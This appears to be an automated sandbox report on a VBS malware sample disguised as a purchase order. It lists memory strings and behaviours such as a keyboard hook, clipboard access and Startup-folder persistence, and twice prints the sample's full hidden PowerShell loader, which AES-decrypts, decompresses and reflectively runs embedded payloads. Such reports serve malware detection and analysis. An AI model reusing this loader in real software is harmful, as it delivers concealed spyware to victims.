    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://geoplugin.net/json.gp
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0:
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0H
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0I
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0Q
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0S
    Source: powershell.exe, 00000006.00000002.2132405885.0000000005031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2291219894.0000000004B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: bhv8D61.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0~
    Source: powershell.exe, powershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
    Source: powershell.exe, powershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
    Source: powershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
    Source: powershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
    Source: powershell.exe, 0000000E.00000002.2283295225.0000000000914000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
    Source: powershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
    Source: powershell.exe, 00000006.00000002.2132405885.0000000005046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2132405885.0000000005031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2291219894.0000000004BA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2291219894.0000000004BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: powershell.exe, powershell.exe, 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: bhv8D61.tmp.14.drString found in binary or memory: https://www.office.com/

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Installs a global keyboard hook
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0040BA30 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,17_2_0040BA30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004068B5
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,17_2_004072B5

    System Summary

    barindex
    Very long command line found
    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2030
    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2071
    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2030Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2071Jump to behavior
    Windows Scripting host queries suspicious COM object (likely to drop second stage)
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
    Wscript starts Powershell (via cmd or directly)
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\dropped.bat
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\dropped.batJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00402CAC NtdllDefWindowProc_A,17_2_00402CAC
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00402D66 NtdllDefWindowProc_A,17_2_00402D66
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_004050C217_2_004050C2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_004014AB17_2_004014AB
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0040513317_2_00405133
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_004051A417_2_004051A4
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0040124617_2_00401246
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0040CA4617_2_0040CA46
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0040523517_2_00405235
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_004032C817_2_004032C8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0040168917_2_00401689
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00402F6017_2_00402F60
    Source: PO#2195112.vbsInitial sample: Strings found which are bigger than 50
    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@30/18@2/2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,17_2_00410DE1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0041208B FindResourceA,SizeofResource,LoadResource,LockResource,17_2_0041208B
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\dropped.batJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4416:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6272:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ih41ueii.2y3.ps1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\dropped.bat
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO#2195112.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: HandleInformation
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: powershell.exe, 0000000E.00000002.2283024317.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
    Source: powershell.exe, 0000000E.00000002.2283024317.0000000000400000.00000040.80000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.2273917779.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
    Source: powershell.exe, 0000000E.00000002.2283024317.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
    Source: powershell.exe, 0000000E.00000002.2283024317.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
    Source: powershell.exe, 0000000E.00000002.2283024317.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
    Source: powershell.exe, 0000000E.00000002.2283024317.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
    Source: powershell.exe, 0000000E.00000002.2286448620.0000000005021000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: powershell.exe, 0000000E.00000002.2283024317.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
    Source: PO#2195112.vbsReversingLabs: Detection: 23%
    Source: PO#2195112.vbsVirustotal: Detection: 7%
    Source: powershell.exeString found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
    Source: powershell.exeString found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO#2195112.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\dropped.bat
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
